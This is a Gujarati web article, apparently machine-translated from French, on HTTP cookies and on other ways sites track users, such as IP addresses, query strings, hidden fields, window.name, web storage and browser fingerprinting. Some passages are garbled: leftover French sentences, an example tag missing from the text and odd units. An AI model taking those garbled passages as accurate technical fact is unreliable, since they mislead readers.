કૂકીઝનો ઉપયોગ ક્લાયંટની સ્થિતિ અને કૂકીમાં સંગ્રહિત રાજ્ય વચ્ચે વિરોધાભાસ પેદા કરી શકે છે. જો વપરાશકર્તા કૂકી મેળવે છે અને બ્રાઉઝરના "પાછળ" બટન પર ક્લિક કરે છે, તો બ્રાઉઝરની સ્થિતિ સામાન્ય રીતે આ સંપાદન પહેલાં જેવી નથી. ઉદાહરણ તરીકે, જો ઓનલાઈન સ્ટોરની બાસ્કેટ કૂકીઝનો ઉપયોગ કરીને બનાવવામાં આવી હોય, તો જ્યારે વપરાશકર્તા બ્રાઉઝર ઇતિહાસ પર પાછા ફરે છે ત્યારે બાસ્કેટની સામગ્રીઓ બદલાઈ શકતી નથી: જો વપરાશકર્તા તેની ટોપલીમાં લેખ ઉમેરવા માટે બટન દબાવશે અને "રીટર્ન" પર ક્લિક કરશે. " બટન, લેખ આમાં રહે છે. આ વપરાશકર્તાનો હેતુ ન પણ હોઈ શકે, જે ચોક્કસપણે લેખના ઉમેરાને રદ કરવા માંગે છે. આ અવિશ્વસનીયતા, મૂંઝવણ અને ભૂલો તરફ દોરી શકે છે. તેથી વેબ ડેવલપર્સે આ સમસ્યાથી વાકેફ હોવા જોઈએ અને આવી પરિસ્થિતિઓને હેન્ડલ કરવાનાં પગલાં અમલમાં મૂકવા જોઈએ.

નિરંતર કૂકીઝની ગોપનીયતા સુરક્ષા નિષ્ણાતો દ્વારા ટીકા કરવામાં આવી છે કારણ કે તે ટૂંક સમયમાં સમાપ્ત થવા માટે સેટ કરવામાં આવી નથી, જેનાથી વેબસાઇટ્સને વપરાશકર્તાઓને ટ્રેક કરવા અને સમય જતાં તેમની પ્રોફાઇલ બનાવવાની મંજૂરી આપે છે. કૂકીઝનું આ પાસું સત્ર હાઇજેકની સમસ્યાનો પણ એક ભાગ છે, કારણ કે ચોરાયેલી સતત કૂકીનો ઉપયોગ નોંધપાત્ર સમયગાળા માટે વપરાશકર્તાની નકલ કરવા માટે થઈ શકે છે.

આ પણ વાંચવા માટે: ગફામ: તેઓ કોણ છે? શા માટે તેઓ (ક્યારેક) આટલા ડરામણા હોય છે?

કૂકીઝ માટે વિકલ્પો

કૂકીઝનો ઉપયોગ કરીને કરી શકાય તેવા કેટલાક ઓપરેશન્સ અન્ય મિકેનિઝમ્સનો ઉપયોગ કરીને પણ કરી શકાય છે જે કૂકીઝને બાયપાસ કરે છે અથવા કાઢી નાખેલી કૂકીઝને ફરીથી બનાવે છે, જે કૂકીઝ કરતાં ગોપનીયતા સમસ્યાઓ સમાન રીતે (અથવા ક્યારેક અદ્રશ્ય હોવાથી ખરાબ) બનાવે છે.

IP સરનામું

પેજ પર કોલ કરતા કોમ્પ્યુટરના IP એડ્રેસથી યુઝર્સને ટ્રેક કરી શકાય છે. આ ટેકનિક વર્લ્ડ વાઇડ વેબની રજૂઆત પછી ઉપલબ્ધ છે, કારણ કે પૃષ્ઠો ડાઉનલોડ કરવામાં આવે છે, સર્વર બ્રાઉઝર અથવા પ્રોક્સી ચલાવતા કમ્પ્યુટરના IP સરનામાંની વિનંતી કરે છે, જો કોઈનો ઉપયોગ થતો નથી. સર્વર આ માહિતીને ટ્રૅક કરી શકે છે કે પછી કૂકીઝ ઉપયોગમાં છે કે નહીં. જો કે, આ સરનામાંઓ સામાન્ય રીતે કૂકીઝ કરતાં વપરાશકર્તાને ઓળખવામાં ઓછા વિશ્વસનીય છે કારણ કે કમ્પ્યુટર્સ અને પ્રોક્સીઝ બહુવિધ વપરાશકર્તાઓ દ્વારા શેર કરવામાં આવી શકે છે, અને સમાન કમ્પ્યુટર દરેક કાર્ય સત્ર પર અલગ IP સરનામું પ્રાપ્ત કરી શકે છે (જેમ કે c ઘણીવાર ટેલિફોન કનેક્શન માટેનો કેસ) .

IP એડ્રેસ દ્વારા ટ્રેકિંગ કેટલીક પરિસ્થિતિઓમાં વિશ્વસનીય હોઈ શકે છે, જેમ કે બ્રોડબેન્ડ કનેક્શન કે જે લાંબા સમય સુધી સમાન IP એડ્રેસ જાળવી રાખે છે, જ્યાં સુધી પાવર ચાલુ હોય ત્યાં સુધી.

ટોર જેવી કેટલીક સિસ્ટમ ઇન્ટરનેટની અનામી જાળવવા અને IP એડ્રેસ દ્વારા ટ્રેકિંગને અશક્ય અથવા અવ્યવહારુ બનાવવા માટે ડિઝાઇન કરવામાં આવી છે.

URL ને

વધુ ચોક્કસ તકનીક URL માં માહિતી એમ્બેડ કરવા પર આધારિત છે. URL નો ક્વેરી સ્ટ્રિંગ ભાગ એ એક તકનીક છે જેનો ઉપયોગ સામાન્ય રીતે આ હેતુ માટે થાય છે, પરંતુ અન્ય ભાગોનો પણ ઉપયોગ કરી શકાય છે. જાવા સર્વરલેટ અને PHP સેશન મિકેનિઝમ બંને આ પદ્ધતિનો ઉપયોગ કરે છે જો કૂકીઝ સક્ષમ ન હોય.

આ પદ્ધતિમાં વેબ સર્વર વેબ પૃષ્ઠની લિંક્સમાં સ્ટ્રિંગ વિનંતીઓ જોડે છે જે તેને બ્રાઉઝર પર મોકલવામાં આવે છે ત્યારે તેને વહન કરે છે. જ્યારે વપરાશકર્તા લિંકને અનુસરે છે, ત્યારે બ્રાઉઝર સર્વર પર જોડાયેલ ક્વેરી સ્ટ્રિંગ પરત કરે છે.

આ હેતુ માટે ઉપયોગમાં લેવાતી ક્વેરી સ્ટ્રીંગ્સ અને કૂકીઝ ખૂબ સમાન છે, બંને માહિતી સર્વર દ્વારા મનસ્વી રીતે પસંદ કરવામાં આવે છે અને બ્રાઉઝર દ્વારા પરત કરવામાં આવે છે. જો કે, ત્યાં કેટલાક તફાવતો છે: જ્યારે ક્વેરી સ્ટ્રિંગ ધરાવતું URL ફરીથી ઉપયોગમાં લેવાય છે, ત્યારે તે જ માહિતી સર્વરને મોકલવામાં આવે છે. ઉદાહરણ તરીકે, જો વપરાશકર્તાની પસંદગીઓ URL ની ક્વેરી સ્ટ્રિંગમાં એન્કોડ કરેલી હોય અને વપરાશકર્તા તે URL અન્ય વપરાશકર્તાને ઇમેઇલ દ્વારા મોકલે, તો તે વપરાશકર્તા પણ તે પસંદગીઓનો ઉપયોગ કરી શકશે.

બીજી બાજુ, જ્યારે વપરાશકર્તા એક જ પૃષ્ઠને બે વાર એક્સેસ કરે છે, ત્યારે ત્યાં કોઈ ગેરેંટી નથી કે સમાન ક્વેરી સ્ટ્રિંગ બંને વખત ઉપયોગમાં લેવામાં આવશે. ઉદાહરણ તરીકે, જો વપરાશકર્તા પ્રથમ વખત આંતરિક સાઇટના પૃષ્ઠ પરથી પૃષ્ઠ પર ઉતરે છે અને બીજી વખત બાહ્ય પૃષ્ઠથી તે જ પૃષ્ઠ પર ઉતરે છે, તો સાઇટ પૃષ્ઠને સંબંધિત ક્વેરી સ્ટ્રિંગ સામાન્ય રીતે અલગ હોય છે, જ્યારે કૂકીઝ સમાન હોય છે. .

ક્વેરી સ્ટ્રિંગ્સના અન્ય ગેરફાયદા સુરક્ષા સાથે સંબંધિત છે: ક્વેરી સ્ટ્રીંગ્સમાં સત્રને ઓળખતો ડેટા રાખવાથી સત્ર ફિક્સેશન હુમલાઓ, ઓળખકર્તા સંદર્ભ હુમલાઓ અને અન્ય શોષણને સક્ષમ અથવા સરળ બનાવે છે. સત્ર ID ને HTTP કૂકીઝ તરીકે પાસ કરવું વધુ સુરક્ષિત છે.

છુપાયેલ ફોર્મ ક્ષેત્ર

ASP.NET દ્વારા ઉપયોગમાં લેવાતા સત્ર ટ્રેકિંગનું એક સ્વરૂપ, છુપાયેલા ક્ષેત્રો સાથે વેબ ફોર્મ્સનો ઉપયોગ કરવાનો છે. આ ટેકનીક માહિતી વહન કરવા માટે URL ક્વેરી સ્ટ્રીંગનો ઉપયોગ કરવા જેવી જ છે અને તેના સમાન ફાયદા અને ગેરફાયદા છે; અને જો ફોર્મ HTTP GET પદ્ધતિથી પ્રક્રિયા કરવામાં આવે છે, તો ફીલ્ડ્સ વાસ્તવમાં બ્રાઉઝરના URL નો ભાગ બની જાય છે જે ફોર્મ સબમિટ કરતી વખતે તેને મોકલશે. પરંતુ મોટાભાગના ફોર્મ્સ HTTP POST સાથે પ્રક્રિયા કરવામાં આવે છે, જેના કારણે છુપાયેલા ફીલ્ડ્સ સહિત ફોર્મની માહિતીને વધારાના ઇનપુટ તરીકે ઉમેરવામાં આવે છે જે ન તો URL નો ભાગ છે અને ન તો કૂકી.

આ અભિગમના ટ્રેકિંગ પરિપ્રેક્ષ્યમાં બે ફાયદા છે: પ્રથમ, URL ને બદલે HTML સોર્સ કોડ અને POST ઇનપુટમાં મૂકવામાં આવેલી માહિતીને ટ્રૅક કરવાથી સરેરાશ વપરાશકર્તા આ ટ્રેકિંગને ટાળી શકશે; બીજું, જ્યારે વપરાશકર્તા URL ની નકલ કરે છે ત્યારે સત્ર માહિતીની નકલ કરવામાં આવતી નથી (ઉદાહરણ તરીકે, પૃષ્ઠને ડિસ્ક પર સાચવવા અથવા તેને ઇમેઇલ દ્વારા મોકલવા માટે).

વિન્ડો.નામ

બધા સામાન્ય વેબ બ્રાઉઝર્સ DOM ની window.name પ્રોપર્ટીનો ઉપયોગ કરીને JavaScript દ્વારા ખૂબ મોટી માત્રામાં ડેટા (2MB થી 32MB) સ્ટોર કરી શકે છે. આ ડેટાનો ઉપયોગ સત્ર કૂકીઝને બદલે કરી શકાય છે અને તેનો ઉપયોગ સમગ્ર ડોમેન્સમાં પણ થાય છે. ક્લાયંટ-સાઇડ સત્ર ચલોના જટિલ સમૂહને સંગ્રહિત કરવા માટે તકનીકને JSON ઑબ્જેક્ટ્સ સાથે જોડી શકાય છે.

નુકસાન એ છે કે દરેક અલગ વિન્ડો અથવા ટેબમાં શરૂઆતમાં ખાલી window.name હશે; ટૅબ્સ દ્વારા બ્રાઉઝ કરતી વખતે (વપરાશકર્તા દ્વારા ખોલવામાં આવે છે) આનો અર્થ એ છે કે વ્યક્તિગત રીતે ખોલવામાં આવેલી ટૅબ્સમાં વિન્ડો નામ હશે નહીં. વધુમાં window.name નો ઉપયોગ વિવિધ સાઇટ્સ પરના મુલાકાતીઓને ટ્રૅક કરવા માટે કરી શકાય છે જે ગોપનીયતાની સમસ્યા ઊભી કરી શકે છે.

કેટલીક બાબતોમાં સર્વરની બિન-સંડોવણીને કારણે આ કૂકીઝ કરતાં વધુ સુરક્ષિત હોઈ શકે છે, આમ તેને સ્નિફર કૂકીઝના નેટવર્ક હુમલા માટે અભેદ્ય બનાવે છે. જો કે, જો ડેટાને સુરક્ષિત રાખવા માટે વિશેષ પગલાં લેવામાં આવે તો, તે વધુ હુમલાઓ માટે સંવેદનશીલ છે, કારણ કે ડેટા સમાન વિંડોમાં ખોલવામાં આવેલી અન્ય સાઇટ્સ દ્વારા ઉપલબ્ધ છે.

HTTP પ્રમાણીકરણ

HTTP પ્રોટોકોલમાં મૂળભૂત એક્સેસ ઓથેન્ટિકેશન પ્રોટોકોલ અને એક્સેસ ઓથેન્ટિકેશન ડાયજેસ્ટનો સમાવેશ થાય છે, જે વેબ પેજને માત્ર ત્યારે જ એક્સેસ કરવાની મંજૂરી આપે છે જ્યારે વપરાશકર્તાએ યુઝરનેમ અને પાસવર્ડ આપ્યો હોય. ઠીક પાસ. જો સર્વર વેબ પૃષ્ઠની ઍક્સેસ આપવા માટે પ્રમાણપત્રની વિનંતી કરે છે, તો બ્રાઉઝર વપરાશકર્તા પાસેથી તેની વિનંતી કરે છે અને એકવાર મેળવી લીધા પછી, બ્રાઉઝર તેને સંગ્રહિત કરે છે અને તે પછીની બધી HTTP વિનંતીઓમાં મોકલે છે. આ માહિતીનો ઉપયોગ વપરાશકર્તાને ટ્રેક કરવા માટે કરી શકાય છે.

સ્થાનિક શેર કરેલ ઑબ્જેક્ટ

જો બ્રાઉઝરમાં Adobe Flash Player પ્લગઇન શામેલ હોય, તો સ્થાનિક વહેંચાયેલ વસ્તુઓ કૂકીઝ જેવા જ હેતુ માટે ઉપયોગ કરી શકાય છે. તેઓ વેબ ડેવલપર્સ માટે આકર્ષક પસંદગી હોઈ શકે છે કારણ કે:

  • સ્થાનિક શેર કરેલ ઑબ્જેક્ટ માટે ડિફૉલ્ટ કદ મર્યાદા 100 KB છે;
  • સુરક્ષા તપાસો વપરાશકર્તાની કૂકી તપાસથી અલગ હોય છે (તેથી જ્યારે કૂકીઝ ન હોય ત્યારે સ્થાનિક શેર કરેલી વસ્તુઓને મંજૂરી આપી શકાય છે).

આ છેલ્લો મુદ્દો, જે કુકી મેનેજમેન્ટ પોલિસીને Adobe ના સ્થાનિક શેર કરેલ ઑબ્જેક્ટ્સથી અલગ પાડે છે પ્રશ્નો ઉભા કરે છે તેની ગોપનીયતા સેટિંગ્સના વપરાશકર્તા દ્વારા સંચાલન અંગે: તેણે જાણવું જોઈએ કે તેના કૂકીઝના સંચાલનની સ્થાનિક શેર કરેલી વસ્તુઓના સંચાલન પર કોઈ અસર થતી નથી અને તેનાથી વિપરીત.

આ સિસ્ટમની બીજી ટીકા એ છે કે તેનો ઉપયોગ ફક્ત Adobe Flash Player પ્લગઇન દ્વારા જ થઈ શકે છે જે માલિકીનું છે અને વેબ સ્ટાન્ડર્ડ નથી.

ક્લાયન્ટ-સાઇડ દ્રઢતા

કેટલાક વેબ બ્રાઉઝર્સ સ્ક્રિપ્ટ-આધારિત દ્રઢતા પદ્ધતિને સમર્થન આપે છે, જે પૃષ્ઠને પછીના ઉપયોગ માટે સ્થાનિક રીતે માહિતી સંગ્રહિત કરવાની મંજૂરી આપે છે. ઈન્ટરનેટ એક્સપ્લોરર, ઉદાહરણ તરીકે, બ્રાઉઝર ઈતિહાસ, બુકમાર્ક્સ, XML માં સંગ્રહિત ફોર્મેટમાં અથવા ડિસ્ક પર સાચવેલા વેબ પેજ સાથે સીધી માહિતીને સમર્થન આપે છે. માઈક્રોસોફ્ટ ઈન્ટરનેટ એક્સપ્લોરર 5 માટે, ડીએચટીએમએલ વર્તણૂકો દ્વારા વપરાશકર્તા-ડેટા પદ્ધતિ ઉપલબ્ધ છે.

W3C એ HTML 5 માં વેબ સ્ટોરેજ તરીકે ઓળખાતા ક્લાયંટ-સાઇડ ડેટા સ્ટોરેજ માટે એક નવું JavaScript API રજૂ કર્યું અને તેનો હેતુ કૂકીઝને કાયમી ધોરણે બદલવાનો હતો. તે કૂકીઝ જેવું જ છે પરંતુ મોટા પ્રમાણમાં સુધારેલ ક્ષમતા સાથે અને HTTP વિનંતીઓના હેડરમાં માહિતી સંગ્રહિત કર્યા વિના. API બે પ્રકારના વેબ સ્ટોરેજને મંજૂરી આપે છે: લોકલ સ્ટોરેજ અને સેશન સ્ટોરેજ, પર્સિસ્ટન્ટ કૂકીઝ અને સેશન કૂકીઝની જેમ (તે સિવાય સત્ર કૂકીઝ જ્યારે બ્રાઉઝર બંધ હોય ત્યારે સમાપ્ત થાય છે. સત્ર સંગ્રહ જ્યારે ટેબ બંધ હોય ત્યારે સમાપ્ત થાય છે), અનુક્રમે. વેબ સ્ટોરેજ Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 અને Opera 10.50 દ્વારા સપોર્ટેડ છે.

વેબ પેજીસમાં જાવાસ્ક્રિપ્ટ પ્રોગ્રામનો ઉપયોગ કરીને એક અલગ પદ્ધતિ સામાન્ય રીતે બ્રાઉઝર કેશીંગ (રીફ્રેશ કરવાને બદલે મેમરીમાં) પર આધાર રાખે છે. 

ઉદાહરણ તરીકે, પૃષ્ઠમાં ટેગ હોઈ શકે છે . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

આ સમયે, પ્રોગ્રામ કેશ મેમરીમાં રહે છે અને મુલાકાત લીધેલ પૃષ્ઠ બીજી વખત ફરીથી લોડ થતું નથી. પરિણામે, જો પ્રોગ્રામમાં વૈશ્વિક ચલ (ઉદાહરણ તરીકે var id = 3243242;) હોય, તો આ ઓળખકર્તા માન્ય રહે છે અને એકવાર પૃષ્ઠ ફરીથી લોડ થઈ જાય અથવા એકવાર પ્રોગ્રામને લિંક કરતું પૃષ્ઠ લોડ થઈ જાય તે પછી અન્ય JavaScript કોડ દ્વારા તેનો ઉપયોગ કરી શકાય છે. 

આ પદ્ધતિનો મુખ્ય ગેરલાભ એ છે કે JavaScript વૈશ્વિક ચલ સ્થિર હોવું જોઈએ, એટલે કે તેને કૂકીની જેમ બદલી અથવા કાઢી શકાતું નથી.

વેબ બ્રાઉઝર ફિંગરપ્રિન્ટ

બ્રાઉઝર ફિંગરપ્રિન્ટ એ ઓળખના હેતુઓ માટે બ્રાઉઝરની ગોઠવણી સેટિંગ્સ વિશે એકત્રિત કરવામાં આવેલી માહિતી છે. કૂકીઝ અક્ષમ હોય ત્યારે પણ આ ફિંગરપ્રિન્ટ્સનો ઉપયોગ ઇન્ટરનેટ વપરાશકર્તા અથવા ઉપકરણને સંપૂર્ણ અથવા આંશિક રીતે ઓળખવા માટે થઈ શકે છે.

મૂળભૂત વેબ બ્રાઉઝર રૂપરેખાંકન માહિતી લાંબા સમયથી વેબસાઈટ પ્રેક્ષકો સેવાઓ દ્વારા માનવ વેબ ટ્રાફિકને ચોક્કસ રીતે માપવા અને વિવિધ પ્રકારના ક્લિક છેતરપિંડી શોધવાના હેતુથી એકત્રિત કરવામાં આવી છે. ક્લાયન્ટ-સાઇડ સ્ક્રિપ્ટીંગ ભાષાઓની મદદથી, વધુ સચોટ માહિતી ભેગી કરવી હવે શક્ય છે.

આ માહિતીને થોડી સ્ટ્રિંગમાં રૂપાંતરિત કરવાથી ઉપકરણ ફિંગરપ્રિન્ટ ઉત્પન્ન થાય છે. 2010 માં, ઇલેક્ટ્રોનિક ફ્રન્ટિયર ફાઉન્ડેશન (EFF) એ બ્રાઉઝરની ફિંગરપ્રિન્ટની એન્ટ્રોપીને ઓછામાં ઓછી માપી હતી. 18,1 બિટ્સ, અને તે કેનવાસ ફિંગરપ્રિંટિંગમાં એડવાન્સિસ પહેલાની વાત હતી કે એન્ટ્રોપીમાં 5,7 બિટ્સ ઉમેર્યા હતા.

ટૂંકમાં કૂકીઝ

કૂકીઝ એ વેબ બ્રાઉઝર દ્વારા વેબસાઈટ વિઝિટરની હાર્ડ ડ્રાઈવ પર સંગ્રહિત નાની ટેક્સ્ટ ફાઈલો છે અને જેનો ઉપયોગ મુલાકાતીઓ વિશેની માહિતી અથવા સાઇટ દ્વારા તેમની મુસાફરી વિશે રેકોર્ડ કરવા માટે (અન્ય વસ્તુઓની સાથે) કરવામાં આવે છે. વેબમાસ્ટર આમ મુલાકાતીની આદતોને ઓળખી શકે છે અને દરેક મુલાકાતી માટે તેની સાઇટની રજૂઆતને વ્યક્તિગત કરી શકે છે; કૂકીઝ પછી હોમ પેજ પર કેટલા લેખો પ્રદર્શિત કરવા અથવા કોઈપણ ખાનગી પક્ષ માટે લૉગિન પ્રમાણપત્રો જાળવી રાખવાનું યાદ રાખવાનું શક્ય બનાવે છે: જ્યારે મુલાકાતી સાઇટ પર પાછો આવે છે, ત્યારે તેના માટે તેનું નામ અને પાસવર્ડ ટાઇપ કરવો જરૂરી નથી. ઓળખી શકાય છે, કારણ કે તે કૂકીમાં આપમેળે વાંચવામાં આવે છે.

કૂકીનું આયુષ્ય મર્યાદિત હોય છે, જે સાઇટ ડિઝાઇનર દ્વારા સેટ કરવામાં આવે છે. તેઓ સાઇટ પરના સત્રના અંતે પણ સમાપ્ત થઈ શકે છે, જે બ્રાઉઝરના બંધ થવાને અનુરૂપ છે. મુલાકાતીઓ માટે જીવન સરળ બનાવવા અને તેમને વધુ સંબંધિત માહિતી સાથે પ્રસ્તુત કરવા માટે કૂકીઝનો વ્યાપકપણે ઉપયોગ થાય છે. પરંતુ વિશેષ તકનીકો ઘણી સાઇટ્સ પર મુલાકાતીને અનુસરવાનું શક્ય બનાવે છે અને આમ તેની આદતો પર ખૂબ વ્યાપક માહિતી એકત્રિત અને ક્રોસ-ચેક કરવાનું શક્ય બનાવે છે. આ પદ્ધતિએ કૂકીઝના ઉપયોગને સર્વેલન્સ ટેકનિક તરીકે પ્રતિષ્ઠા આપી છે જે મુલાકાતીઓની ગોપનીયતાનું ઉલ્લંઘન કરે છે, જે કમનસીબે બિન-તકનીકી કારણોસર ઉપયોગના ઘણા કિસ્સાઓમાં વાસ્તવિકતા સાથે સુસંગત હોય છે અથવા વપરાશકર્તાની અપેક્ષાઓને માન આપતા નથી.

આ કાયદેસરના ભયના પ્રતિભાવમાં, HTML 5 ક્લાયન્ટ-સાઇડ ડેટા સ્ટોરેજ માટે વેબ સ્ટોરેજ તરીકે ઓળખાતી નવી JavaScript API રજૂ કરે છે, જે વધુ સુરક્ષિત અને વધુ ક્ષમતા સાથે છે, જેનો હેતુ કૂકીઝને બદલવાનો છે.

કૂકીઝનો સંગ્રહ

કેટલાક બ્રાઉઝર્સ સાથે, કૂકી સરળતાથી સંપાદનયોગ્ય છે, નોટપેડ જેવા સરળ ટેક્સ્ટ એડિટર તેના મૂલ્યોને મેન્યુઅલી બદલવા માટે પૂરતા છે.

બ્રાઉઝરના આધારે કૂકીઝ અલગ રીતે સાચવવામાં આવે છે:

  • માઇક્રોસોફ્ટ ઇન્ટરનેટ એક્સપ્લોરર દરેક કૂકીને અલગ ફાઇલમાં સાચવે છે;
  • મોઝીલા ફાયરફોક્સ તેની બધી કૂકીઝને એક ફાઇલમાં સાચવે છે;
  • ઓપેરા તેની બધી કૂકીઝને એક જ ફાઈલમાં સાચવે છે અને તેને એન્ક્રિપ્ટ કરે છે (સોફ્ટવેર વિકલ્પો સિવાય તેને સંશોધિત કરવું અશક્ય છે);
  • એપલ સફારી તેની તમામ કૂકીઝને એક જ .plist એક્સ્ટેંશન ફાઇલમાં સાચવે છે. ફેરફાર શક્ય છે પરંતુ ખૂબ સરળ નથી, સિવાય કે તમે સોફ્ટવેર વિકલ્પોમાંથી પસાર થાઓ.

બ્રાઉઝર્સ આધાર માટે જરૂરી છે એક મિનિમા :

  • 300 એકસાથે કૂકીઝ;
  • કૂકી દીઠ 4 o;
  • હોસ્ટ અથવા ડોમેન દીઠ 20 કૂકીઝ.
[કુલ: 0 મીન: 0]

દ્વારા લખાયેલી સમીક્ષાઓ સંપાદકો

નિષ્ણાત સંપાદકોની ટીમ ઉત્પાદનો સંશોધન, વ્યવહારુ પરીક્ષણો કરવા, ઉદ્યોગ વ્યાવસાયિકોની મુલાકાત લેવા, ગ્રાહક સમીક્ષાઓની સમીક્ષા કરવા અને અમારા બધા પરિણામોને સમજી શકાય તેવું અને વ્યાપક સારાંશ તરીકે લખવામાં તેમનો સમય વિતાવે છે.

Laisser યુએન કમેન્ટાયર

તમારું ઇમેઇલ સરનામું પ્રકાશિત કરવામાં આવશે નહીં. જરૂરી ક્ષેત્રો ચિહ્નિત થયેલ છે *

તમે શુ વિચારો છો, તમને શુ લાગે છે?